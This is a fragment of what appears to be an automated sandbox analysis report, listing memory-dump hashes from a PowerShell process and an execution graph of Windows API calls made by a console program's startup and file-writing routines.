                                                                                                                                                                      • Source File: 00000038.00000002.1900208973.00007FFD9ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ABC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_56_2_7ffd9abc0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7609fe423f2b6aa624d411cc03a129f47c5f99c679c221a254244d5623439cb1
                                                                                                                                                                      • Instruction ID: 921dd108e00ca5204c011b89dbf20a67241e557bf3a665151f27cac95ed11038
                                                                                                                                                                      • Opcode Fuzzy Hash: 7609fe423f2b6aa624d411cc03a129f47c5f99c679c221a254244d5623439cb1
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B41153271CA494FDB58EA5CD8B1DA577E0FFA9315B1001BED48AC7293DA25F802C781
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AC90AA4 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000038.00000002.1900890537.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_56_2_7ffd9ac90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a6d21ebc0edb8344fe88a1de58477cacdad34763e9df4418e7edb2a5c0697a40
                                                                                                                                                                      • Instruction ID: 2f775a2727c411873ae3e4777ab0d7bbb06f219d1384c7565f9999f461fbd2a2
                                                                                                                                                                      • Opcode Fuzzy Hash: a6d21ebc0edb8344fe88a1de58477cacdad34763e9df4418e7edb2a5c0697a40
                                                                                                                                                                      • Instruction Fuzzy Hash: A421E633F0C9594EEBB9A69C68256F873D0EB94721F1801BBD11DD71DADE19A80183C1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9ABC3945 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000038.00000002.1900208973.00007FFD9ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ABC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_56_2_7ffd9abc0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                      • Instruction ID: db7ffd31aebc8eecbc859f38f24e4b6010198c59ba42f1065b306a273003bfdc
                                                                                                                                                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                      • Instruction Fuzzy Hash: 5001A73120CB0C4FD748EF0CE051AA5B3E0FB89324F10056EE58AC3695D636E881CB41
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9ABC5143 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000038.00000002.1900208973.00007FFD9ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ABC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_56_2_7ffd9abc0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b7f0cf55b307302c8981f290f011968a12f7bc13b3e615fec0f166fae733af0a
                                                                                                                                                                      • Instruction ID: 95fcacc0c2254ce942afc9cacb1a90f517ae356263b8fcf763ef5e2f68dcca92
                                                                                                                                                                      • Opcode Fuzzy Hash: b7f0cf55b307302c8981f290f011968a12f7bc13b3e615fec0f166fae733af0a
                                                                                                                                                                      • Instruction Fuzzy Hash: 7AF06C3170C90D4BA70C655CB8565F977C1DB99361B10427FF44AC769BDC16AC8346C5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9ABC6278 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000038.00000002.1900208973.00007FFD9ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ABC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_56_2_7ffd9abc0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f7fea6efe1b7f71eed00bc4e84a25f42d81c574367745f71c8f9171b445c2f3d
                                                                                                                                                                      • Instruction ID: 5118367f42a819bef75dbe2d50b96aa5e1f766cec82bef5474e188c0a5567825
                                                                                                                                                                      • Opcode Fuzzy Hash: f7fea6efe1b7f71eed00bc4e84a25f42d81c574367745f71c8f9171b445c2f3d
                                                                                                                                                                      • Instruction Fuzzy Hash: 30F0A73271C6044FDB4CAA0CF452DB5B3D0E799324B10017EE48BC2296E927E842C685
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:8.2%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:0.5%
                                                                                                                                                                      Total number of Nodes:1142
                                                                                                                                                                      Total number of Limit Nodes:29
                                                                                                                                                                      execution_graph 38193 7ff7d79c3e71 38194 7ff7d79c3e81 38193->38194 38195 7ff7d79c3e89 38193->38195 38204 7ff7d7a19a14 49 API calls 38194->38204 38197 7ff7d79c3edd 38195->38197 38198 7ff7d79c3ea3 38195->38198 38207 7ff7d7a1a610 38197->38207 38205 7ff7d79e331c 48 API calls 2 library calls 38198->38205 38202 7ff7d79c3eab 38202->38197 38206 7ff7d79c63e8 8 API calls 2 library calls 38202->38206 38204->38195 38205->38202 38206->38197 38209 7ff7d7a1a61a 38207->38209 38208 7ff7d7a1a6a0 IsProcessorFeaturePresent 38211 7ff7d7a1a6b7 38208->38211 38209->38208 38210 7ff7d79c3eef 38209->38210 38216 7ff7d7a1a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38211->38216 38213 7ff7d7a1a6ca 38217 7ff7d7a1a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38213->38217 38216->38213 38218 7ff7d7a1b0fc 38237 7ff7d7a1aa8c 38218->38237 38222 7ff7d7a1b148 38227 7ff7d7a1b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 38222->38227 38245 7ff7d7a2472c 38222->38245 38223 7ff7d7a1b123 __scrt_acquire_startup_lock 38223->38222 38293 7ff7d7a1b52c 7 API calls memcpy_s 38223->38293 38226 7ff7d7a1b16d 38227->38226 38228 7ff7d7a1b1f7 38227->38228 38294 7ff7d7a22574 35 API calls FindHandlerForForeignException 38227->38294 38249 7ff7d7a23fc4 38228->38249 38236 7ff7d7a1b220 38295 7ff7d7a1ac64 8 API calls 2 library calls 38236->38295 38238 7ff7d7a1aaae __isa_available_init 38237->38238 38296 7ff7d7a1e2f8 38238->38296 38241 7ff7d7a1aab7 38241->38223 38292 7ff7d7a1b52c 7 API calls memcpy_s 38241->38292 38247 7ff7d7a24744 38245->38247 38246 7ff7d7a24766 38246->38227 38247->38246 38345 7ff7d7a1b010 38247->38345 38250 7ff7d7a23fd4 38249->38250 38252 7ff7d7a1b20c 38249->38252 38402 7ff7d7a23c84 54 API calls 38250->38402 38253 7ff7d79f7e20 38252->38253 38403 7ff7d7a0b470 GetModuleHandleW 38253->38403 38259 7ff7d79f7e58 SetErrorMode GetModuleHandleW 38260 7ff7d7a048cc 21 API calls 38259->38260 38261 7ff7d79f7e7d 38260->38261 38262 7ff7d7a03e48 137 API calls 38261->38262 38263 7ff7d79f7e90 38262->38263 38264 7ff7d79d3d3c 126 API calls 38263->38264 38265 7ff7d79f7e9c 38264->38265 38266 7ff7d7a1a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38265->38266 38267 7ff7d79f7ead 38266->38267 38268 7ff7d79f7ebf 38267->38268 38269 7ff7d79d3f18 70 API calls 38267->38269 38270 7ff7d79d4d1c 157 API calls 38268->38270 38269->38268 38271 7ff7d79f7ed6 38270->38271 38272 7ff7d79f7eef 38271->38272 38274 7ff7d79d6ad0 154 API calls 38271->38274 38273 7ff7d79d4d1c 157 API calls 38272->38273 38275 7ff7d79f7eff 38273->38275 38276 7ff7d79f7ee7 38274->38276 38277 7ff7d79f7f0d 38275->38277 38280 7ff7d79f7f14 38275->38280 38278 7ff7d79d4e48 160 API calls 38276->38278 38279 7ff7d7a0b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38277->38279 38278->38272 38279->38280 38281 7ff7d79d4888 58 API calls 38280->38281 38282 7ff7d79f7f57 38281->38282 38283 7ff7d79d4fd0 268 API calls 38282->38283 38284 7ff7d79f7f5f 38283->38284 38285 7ff7d79f7f9e 38284->38285 38286 7ff7d79f7f8c 38284->38286 38290 7ff7d7a1b684 GetModuleHandleW 38285->38290 38287 7ff7d7a0b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38286->38287 38288 7ff7d79f7f93 38287->38288 38288->38285 38289 7ff7d7a0b57c 14 API calls 38288->38289 38289->38285 38291 7ff7d7a1b698 38290->38291 38291->38236 38292->38223 38293->38222 38294->38228 38295->38226 38297 7ff7d7a1e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 38296->38297 38309 7ff7d7a1eb08 38297->38309 38300 7ff7d7a1aab3 38300->38241 38304 7ff7d7a245e4 38300->38304 38302 7ff7d7a1e318 38302->38300 38316 7ff7d7a1eb50 DeleteCriticalSection 38302->38316 38305 7ff7d7a29d4c 38304->38305 38306 7ff7d7a1aac0 38305->38306 38333 7ff7d7a266c0 38305->38333 38306->38241 38308 7ff7d7a1e32c 8 API calls 3 library calls 38306->38308 38308->38241 38311 7ff7d7a1eb10 38309->38311 38312 7ff7d7a1eb41 38311->38312 38313 7ff7d7a1e30b 38311->38313 38317 7ff7d7a1e678 38311->38317 38322 7ff7d7a1eb50 DeleteCriticalSection 38312->38322 38313->38300 38315 7ff7d7a1e8a4 8 API calls 3 library calls 38313->38315 38315->38302 38316->38300 38323 7ff7d7a1e34c 38317->38323 38320 7ff7d7a1e6cf InitializeCriticalSectionAndSpinCount 38321 7ff7d7a1e6bb 38320->38321 38321->38311 38322->38313 38327 7ff7d7a1e3b2 38323->38327 38329 7ff7d7a1e3ad 38323->38329 38324 7ff7d7a1e47a 38326 7ff7d7a1e489 GetProcAddress 38324->38326 38324->38327 38325 7ff7d7a1e3e5 LoadLibraryExW 38328 7ff7d7a1e40b GetLastError 38325->38328 38325->38329 38326->38327 38330 7ff7d7a1e4a1 38326->38330 38327->38320 38327->38321 38328->38329 38331 7ff7d7a1e416 LoadLibraryExW 38328->38331 38329->38324 38329->38325 38329->38327 38332 7ff7d7a1e458 FreeLibrary 38329->38332 38330->38327 38331->38329 38332->38329 38344 7ff7d7a26938 EnterCriticalSection 38333->38344 38335 7ff7d7a266d0 38336 7ff7d7a28050 32 API calls 38335->38336 38337 7ff7d7a266d9 38336->38337 38338 7ff7d7a266e7 38337->38338 38339 7ff7d7a264d0 34 API calls 38337->38339 38340 7ff7d7a26998 fflush LeaveCriticalSection 38338->38340 38341 7ff7d7a266e2 38339->38341 38342 7ff7d7a266f3 38340->38342 38343 7ff7d7a265bc GetStdHandle GetFileType 38341->38343 38342->38305 38343->38338 38346 7ff7d7a1b020 pre_c_initialization 38345->38346 38366 7ff7d7a22b00 38346->38366 38348 7ff7d7a1b02c pre_c_initialization 38372 7ff7d7a1aad8 38348->38372 38350 7ff7d7a1b045 38351 7ff7d7a1b049 _RTC_Initialize 38350->38351 38352 7ff7d7a1b0b5 38350->38352 38377 7ff7d7a1ace0 38351->38377 38382 7ff7d7a1b52c 7 API calls memcpy_s 38352->38382 38354 7ff7d7a1b0bf 38383 7ff7d7a1b52c 7 API calls memcpy_s 38354->38383 38356 7ff7d7a1b05a pre_c_initialization 38380 7ff7d7a23b0c 49 API calls 4 library calls 38356->38380 38358 7ff7d7a1b0ca __scrt_initialize_default_local_stdio_options 38358->38247 38360 7ff7d7a1b066 38360->38354 38361 7ff7d7a1b06a 38360->38361 38381 7ff7d7a1b7dc RtlInitializeSListHead 38361->38381 38367 7ff7d7a22b11 38366->38367 38368 7ff7d7a22b19 38367->38368 38384 7ff7d7a24f3c 15 API calls _invalid_parameter_noinfo 38367->38384 38368->38348 38370 7ff7d7a22b28 38385 7ff7d7a24e1c 31 API calls _invalid_parameter_noinfo 38370->38385 38373 7ff7d7a1aaf0 __scrt_initialize_onexit_tables 38372->38373 38374 7ff7d7a1ab96 38372->38374 38373->38350 38386 7ff7d7a1b52c 7 API calls memcpy_s 38374->38386 38376 7ff7d7a1aba0 38387 7ff7d7a1ac90 38377->38387 38379 7ff7d7a1ace9 38379->38356 38380->38360 38382->38354 38383->38358 38384->38370 38385->38368 38386->38376 38388 7ff7d7a1acbf 38387->38388 38390 7ff7d7a1acb5 _onexit 38387->38390 38391 7ff7d7a24434 38388->38391 38390->38379 38394 7ff7d7a23ff0 38391->38394 38401 7ff7d7a26938 EnterCriticalSection 38394->38401 38396 7ff7d7a2400c 38397 7ff7d7a241cc _onexit 34 API calls 38396->38397 38398 7ff7d7a24015 38397->38398 38399 7ff7d7a26998 fflush LeaveCriticalSection 38398->38399 38400 7ff7d7a2401e 38399->38400 38400->38390 38402->38252 38404 7ff7d79f7e45 38403->38404 38405 7ff7d7a0b496 GetProcAddress 38403->38405 38408 7ff7d79d7a68 38404->38408 38406 7ff7d7a0b4cb GetProcAddress 38405->38406 38407 7ff7d7a0b4ae 38405->38407 38406->38404 38407->38406 38409 7ff7d79d7a76 38408->38409 38429 7ff7d7a22ae4 38409->38429 38411 7ff7d79d7a80 38412 7ff7d7a22ae4 setbuf 60 API calls 38411->38412 38413 7ff7d79d7a94 38412->38413 38438 7ff7d79d7b44 GetStdHandle GetFileType 38413->38438 38416 7ff7d79d7b44 3 API calls 38417 7ff7d79d7aae 38416->38417 38418 7ff7d79d7b44 3 API calls 38417->38418 38420 7ff7d79d7abe 38418->38420 38419 7ff7d79d7b12 38428 7ff7d79dcd78 SetConsoleCtrlHandler 38419->38428 38422 7ff7d79d7aeb 38420->38422 38441 7ff7d7a22abc 31 API calls 2 library calls 38420->38441 38422->38419 38443 7ff7d7a22abc 31 API calls 2 library calls 38422->38443 38423 7ff7d79d7adf 38442 7ff7d7a22b40 33 API calls 3 library calls 38423->38442 38425 7ff7d79d7b06 38444 7ff7d7a22b40 33 API calls 3 library calls 38425->38444 38430 7ff7d7a22ae9 38429->38430 38431 7ff7d7a27ee8 38430->38431 38433 7ff7d7a27f23 38430->38433 38445 7ff7d7a24f3c 15 API calls _invalid_parameter_noinfo 38431->38445 38447 7ff7d7a27d98 60 API calls 2 library calls 38433->38447 38434 7ff7d7a27eed 38446 7ff7d7a24e1c 31 API calls _invalid_parameter_noinfo 38434->38446 38437 7ff7d7a27ef8 38437->38411 38439 7ff7d79d7a9e 38438->38439 38440 7ff7d79d7b61 GetConsoleMode 38438->38440 38439->38416 38440->38439 38441->38423 38442->38422 38443->38425 38444->38419 38445->38434 38446->38437 38447->38437 38448 7ff7d7a2231c 38449 7ff7d7a2238c 38448->38449 38450 7ff7d7a22342 GetModuleHandleW 38448->38450 38461 7ff7d7a26938 EnterCriticalSection 38449->38461 38450->38449 38456 7ff7d7a2234f 38450->38456 38452 7ff7d7a26998 fflush LeaveCriticalSection 38453 7ff7d7a22460 38452->38453 38454 7ff7d7a2246c 38453->38454 38458 7ff7d7a22488 11 API calls 38453->38458 38455 7ff7d7a22396 38457 7ff7d7a22410 38455->38457 38459 7ff7d7a243b8 16 API calls 38455->38459 38456->38449 38462 7ff7d7a224d4 GetModuleHandleExW 38456->38462 38457->38452 38458->38454 38459->38457 38463 7ff7d7a224fe GetProcAddress 38462->38463 38464 7ff7d7a22525 38462->38464 38463->38464 38467 7ff7d7a22518 38463->38467 38465 7ff7d7a2252f FreeLibrary 38464->38465 38466 7ff7d7a22535 38464->38466 38465->38466 38466->38449 38467->38464 38468 7ff7d79c82f0 38469 7ff7d79c8306 38468->38469 38481 7ff7d79c836f 38468->38481 38470 7ff7d79c8324 38469->38470 38473 7ff7d79c8371 38469->38473 38469->38481 38588 7ff7d79e2414 61 API calls 38470->38588 38472 7ff7d79c8347 38589 7ff7d79e1998 138 API calls 38472->38589 38473->38481 38597 7ff7d79e1998 138 API calls 38473->38597 38476 7ff7d79c835e 38590 7ff7d79e18ac 38476->38590 38491 7ff7d79ca410 38481->38491 38482 7ff7d79c8578 38483 7ff7d79cb540 147 API calls 38482->38483 38488 7ff7d79c858f 38483->38488 38484 7ff7d79cb540 147 API calls 38484->38482 38485 7ff7d79c8634 38486 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 38485->38486 38487 7ff7d79c8663 38486->38487 38488->38485 38598 7ff7d79c9628 175 API calls 38488->38598 38599 7ff7d79f7a68 38491->38599 38494 7ff7d79c853a 38496 7ff7d79cb540 38494->38496 38500 7ff7d79cb55f setbuf 38496->38500 38497 7ff7d79cb5a1 38498 7ff7d79cb5d8 38497->38498 38499 7ff7d79cb5b8 38497->38499 38747 7ff7d79f8c1c 38498->38747 38633 7ff7d79caba0 38499->38633 38500->38497 38629 7ff7d79ca4d0 38500->38629 38503 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 38504 7ff7d79c854f 38503->38504 38504->38482 38504->38484 38505 7ff7d79cb67f 38506 7ff7d79cbc91 38505->38506 38508 7ff7d79cb6a5 38505->38508 38509 7ff7d79cbbae 38505->38509 38507 7ff7d79cb5d3 38506->38507 38511 7ff7d79e2574 126 API calls 38506->38511 38507->38503 38508->38507 38519 7ff7d79cb6b5 38508->38519 38538 7ff7d79cb79f 38508->38538 38512 7ff7d79f8d00 48 API calls 38509->38512 38511->38507 38514 7ff7d79cbc5c 38512->38514 38816 7ff7d79f8d38 48 API calls 38514->38816 38517 7ff7d79cbc69 38817 7ff7d79f8d38 48 API calls 38517->38817 38519->38507 38781 7ff7d79f8d00 38519->38781 38521 7ff7d79cbc76 38818 7ff7d79f8d38 48 API calls 38521->38818 38523 7ff7d79cbc84 38819 7ff7d79f8d88 48 API calls 38523->38819 38528 7ff7d79cb726 38785 7ff7d79f8d38 48 API calls 38528->38785 38530 7ff7d79cb733 38531 7ff7d79cb749 38530->38531 38786 7ff7d79f8d88 48 API calls 38530->38786 38532 7ff7d79cb75c 38531->38532 38787 7ff7d79f8d38 48 API calls 38531->38787 38535 7ff7d79cb779 38532->38535 38537 7ff7d79f8d00 48 API calls 38532->38537 38788 7ff7d79f8f94 38535->38788 38537->38532 38539 7ff7d79cb8e5 38538->38539 38798 7ff7d79cc3c8 CharLowerW CharUpperW 38538->38798 38799 7ff7d7a0d840 WideCharToMultiByte 38539->38799 38543 7ff7d79cb910 38543->38543 38544 7ff7d79cb9a1 38543->38544 38801 7ff7d79c945c 55 API calls _UnwindNestedFrames 38543->38801 38546 7ff7d79f8d00 48 API calls 38544->38546 38547 7ff7d79cb9c4 38546->38547 38802 7ff7d79f8d38 48 API calls 38547->38802 38549 7ff7d79cb9d1 38803 7ff7d79f8d38 48 API calls 38549->38803 38551 7ff7d79cb9de 38804 7ff7d79f8d88 48 API calls 38551->38804 38553 7ff7d79cb9eb 38805 7ff7d79f8d88 48 API calls 38553->38805 38555 7ff7d79cba0b 38556 7ff7d79f8d00 48 API calls 38555->38556 38557 7ff7d79cba27 38556->38557 38806 7ff7d79f8d88 48 API calls 38557->38806 38559 7ff7d79cba37 38560 7ff7d79cba49 38559->38560 38807 7ff7d7a0bc48 15 API calls 38559->38807 38808 7ff7d79f8d88 48 API calls 38560->38808 38563 7ff7d79cba59 38564 7ff7d79f8d00 48 API calls 38563->38564 38565 7ff7d79cba66 38564->38565 38566 7ff7d79f8d00 48 API calls 38565->38566 38567 7ff7d79cba78 38566->38567 38809 7ff7d79f8d38 48 API calls 38567->38809 38569 7ff7d79cba85 38810 7ff7d79f8d88 48 API calls 38569->38810 38571 7ff7d79cba92 38572 7ff7d79cbacd 38571->38572 38811 7ff7d79f8d88 48 API calls 38571->38811 38813 7ff7d79f8e3c 38572->38813 38575 7ff7d79cbab2 38812 7ff7d79f8d88 48 API calls 38575->38812 38578 7ff7d79cbb33 38579 7ff7d79cbb53 38578->38579 38581 7ff7d79f8e3c 48 API calls 38578->38581 38582 7ff7d79cbb6e 38579->38582 38585 7ff7d79f8e3c 48 API calls 38579->38585 38580 7ff7d79f8d00 48 API calls 38583 7ff7d79cbb09 38580->38583 38581->38579 38586 7ff7d79f8f94 126 API calls 38582->38586 38583->38578 38584 7ff7d79f8e3c 48 API calls 38583->38584 38584->38578 38585->38582 38586->38507 38588->38472 38589->38476 38591 7ff7d79e18ca 38590->38591 38596 7ff7d79e18db 38590->38596 38592 7ff7d79e18d6 38591->38592 38593 7ff7d79e18de 38591->38593 38591->38596 39041 7ff7d79e1c24 38592->39041 39046 7ff7d79e1930 38593->39046 38596->38481 38597->38481 38598->38485 38601 7ff7d79f7a8d 38599->38601 38606 7ff7d79ca434 38599->38606 38600 7ff7d79f7aaf 38602 7ff7d79e22e0 12 API calls 38600->38602 38600->38606 38601->38600 38612 7ff7d79f7340 157 API calls 38601->38612 38604 7ff7d79f7adf 38602->38604 38613 7ff7d79e2440 38604->38613 38606->38494 38607 7ff7d79e22e0 38606->38607 38623 7ff7d79e20b4 38607->38623 38610 7ff7d79e2307 38610->38494 38612->38600 38614 7ff7d79e246a SetFilePointer 38613->38614 38617 7ff7d79e2454 38613->38617 38615 7ff7d79e24ad 38614->38615 38616 7ff7d79e248d GetLastError 38614->38616 38615->38606 38616->38615 38619 7ff7d79e2497 38616->38619 38617->38615 38621 7ff7d79dcd00 10 API calls 38617->38621 38619->38615 38622 7ff7d79dcd00 10 API calls 38619->38622 38624 7ff7d79e2130 38623->38624 38627 7ff7d79e20d0 38623->38627 38624->38610 38628 7ff7d79dcd00 10 API calls 38624->38628 38625 7ff7d79e2102 SetFilePointer 38625->38624 38626 7ff7d79e2126 GetLastError 38625->38626 38626->38624 38627->38625 38630 7ff7d79ca4ea 38629->38630 38631 7ff7d79ca4ee 38630->38631 38632 7ff7d79e2440 12 API calls 38630->38632 38631->38497 38632->38631 38634 7ff7d79cabbf setbuf 38633->38634 38635 7ff7d79f8c1c 48 API calls 38634->38635 38641 7ff7d79cabf5 38635->38641 38636 7ff7d79caca7 38637 7ff7d79cb4af 38636->38637 38638 7ff7d79cacbf 38636->38638 38642 7ff7d79cb4ff 38637->38642 38643 7ff7d79e2574 126 API calls 38637->38643 38639 7ff7d79cb35c 38638->38639 38640 7ff7d79cacc8 38638->38640 38645 7ff7d79f8eec 48 API calls 38639->38645 38648 7ff7d79cacdd 38640->38648 38686 7ff7d79caea7 38640->38686 38746 7ff7d79cad60 38640->38746 38641->38636 38641->38637 38820 7ff7d79d9be0 38641->38820 38860 7ff7d79f72c0 38642->38860 38643->38642 38647 7ff7d79cb395 38645->38647 38651 7ff7d79cb3ad 38647->38651 38859 7ff7d79c9e2c 48 API calls 38647->38859 38652 7ff7d79cace6 38648->38652 38653 7ff7d79cad68 38648->38653 38650 7ff7d79d90b8 75 API calls 38654 7ff7d79cac8f 38650->38654 38658 7ff7d79f8eec 48 API calls 38651->38658 38652->38746 38831 7ff7d79f8eec 38652->38831 38656 7ff7d79f8eec 48 API calls 38653->38656 38654->38636 38663 7ff7d79e2574 126 API calls 38654->38663 38659 7ff7d79cad9c 38656->38659 38657 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 38660 7ff7d79cb52b 38657->38660 38661 7ff7d79cb3d4 38658->38661 38664 7ff7d79f8eec 48 API calls 38659->38664 38660->38507 38665 7ff7d79cb3e6 38661->38665 38668 7ff7d79f8eec 48 API calls 38661->38668 38663->38636 38667 7ff7d79cada9 38664->38667 38670 7ff7d79f8eec 48 API calls 38665->38670 38672 7ff7d79f8eec 48 API calls 38667->38672 38668->38665 38669 7ff7d79f8eec 48 API calls 38671 7ff7d79cad31 38669->38671 38673 7ff7d79cb451 38670->38673 38674 7ff7d79f8eec 48 API calls 38671->38674 38675 7ff7d79cadb5 38672->38675 38676 7ff7d79cb471 38673->38676 38682 7ff7d79f8eec 48 API calls 38673->38682 38677 7ff7d79cad46 38674->38677 38678 7ff7d79f8eec 48 API calls 38675->38678 38680 7ff7d79cb486 38676->38680 38683 7ff7d79f8e3c 48 API calls 38676->38683 38679 7ff7d79f8f94 126 API calls 38677->38679 38681 7ff7d79cadc2 38678->38681 38679->38746 38684 7ff7d79f8f94 126 API calls 38680->38684 38685 7ff7d79f8d00 48 API calls 38681->38685 38682->38676 38683->38680 38684->38746 38688 7ff7d79cadcf 38685->38688 38687 7ff7d79cafda 38686->38687 38849 7ff7d79c9b64 48 API calls _UnwindNestedFrames 38686->38849 38697 7ff7d79caff2 38687->38697 38850 7ff7d79c9d98 48 API calls 38687->38850 38689 7ff7d79d90b8 75 API calls 38688->38689 38691 7ff7d79cae22 38689->38691 38693 7ff7d79f8e3c 48 API calls 38691->38693 38694 7ff7d79cae33 38693->38694 38695 7ff7d79f8e3c 48 API calls 38694->38695 38696 7ff7d79cae48 38695->38696 38835 7ff7d7a09ce4 38696->38835 38699 7ff7d79cb02b 38697->38699 38851 7ff7d79c9efc 48 API calls _UnwindNestedFrames 38697->38851 38698 7ff7d79cb0af 38701 7ff7d79cb0c8 38698->38701 38853 7ff7d79ca1a0 48 API calls 2 library calls 38698->38853 38699->38698 38852 7ff7d79ca2c8 48 API calls 38699->38852 38704 7ff7d79cb0e2 38701->38704 38854 7ff7d79ca350 48 API calls _UnwindNestedFrames 38701->38854 38708 7ff7d79f8eec 48 API calls 38704->38708 38710 7ff7d79cb0fc 38708->38710 38712 7ff7d79f8eec 48 API calls 38710->38712 38713 7ff7d79cb109 38712->38713 38715 7ff7d79cb11f 38713->38715 38717 7ff7d79f8eec 48 API calls 38713->38717 38714 7ff7d79f8e3c 48 API calls 38716 7ff7d79cae80 38714->38716 38845 7ff7d79f8e94 38715->38845 38719 7ff7d79f8f94 126 API calls 38716->38719 38717->38715 38719->38746 38721 7ff7d79f8eec 48 API calls 38722 7ff7d79cb147 38721->38722 38723 7ff7d79f8e94 48 API calls 38722->38723 38724 7ff7d79cb15f 38723->38724 38725 7ff7d79f8eec 48 API calls 38724->38725 38730 7ff7d79cb16c 38725->38730 38726 7ff7d79cb18a 38727 7ff7d79cb1a9 38726->38727 38856 7ff7d79f8d88 48 API calls 38726->38856 38729 7ff7d79f8e94 48 API calls 38727->38729 38731 7ff7d79cb1bc 38729->38731 38730->38726 38855 7ff7d79f8d88 48 API calls 38730->38855 38733 7ff7d79f8eec 48 API calls 38731->38733 38734 7ff7d79cb1d6 38733->38734 38736 7ff7d79cb1e9 38734->38736 38857 7ff7d79cc3c8 CharLowerW CharUpperW 38734->38857 38736->38736 38737 7ff7d79f8eec 48 API calls 38736->38737 38738 7ff7d79cb21f 38737->38738 38739 7ff7d79f8e3c 48 API calls 38738->38739 38740 7ff7d79cb230 38739->38740 38741 7ff7d79cb247 38740->38741 38742 7ff7d79f8e3c 48 API calls 38740->38742 38743 7ff7d79f8f94 126 API calls 38741->38743 38742->38741 38744 7ff7d79cb278 38743->38744 38744->38746 38858 7ff7d79f70d8 4 API calls 2 library calls 38744->38858 38746->38657 38901 7ff7d79f8f28 38747->38901 38750 7ff7d79d90b8 38751 7ff7d79d9123 38750->38751 38758 7ff7d79d91a9 38750->38758 38751->38758 38919 7ff7d7a07e74 38751->38919 38752 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 38755 7ff7d79cb66e 38752->38755 38766 7ff7d79e2574 38755->38766 38756 7ff7d7a0d840 WideCharToMultiByte 38757 7ff7d79d9157 38756->38757 38757->38758 38759 7ff7d79d91c4 38757->38759 38760 7ff7d79d916a 38757->38760 38758->38752 38938 7ff7d79d9338 12 API calls _UnwindNestedFrames 38759->38938 38761 7ff7d79d91ab 38760->38761 38763 7ff7d79d916f 38760->38763 38937 7ff7d79d951c 71 API calls _UnwindNestedFrames 38761->38937 38763->38758 38923 7ff7d79d98b0 38763->38923 38767 7ff7d79e25a5 38766->38767 38768 7ff7d79e259e 38766->38768 38769 7ff7d79e25ab GetStdHandle 38767->38769 38774 7ff7d79e25ba 38767->38774 38768->38505 38769->38774 38770 7ff7d79e2619 WriteFile 38770->38774 38771 7ff7d79e25cf WriteFile 38772 7ff7d79e260b 38771->38772 38771->38774 38772->38771 38772->38774 38773 7ff7d79e2658 GetLastError 38773->38774 38774->38768 38774->38770 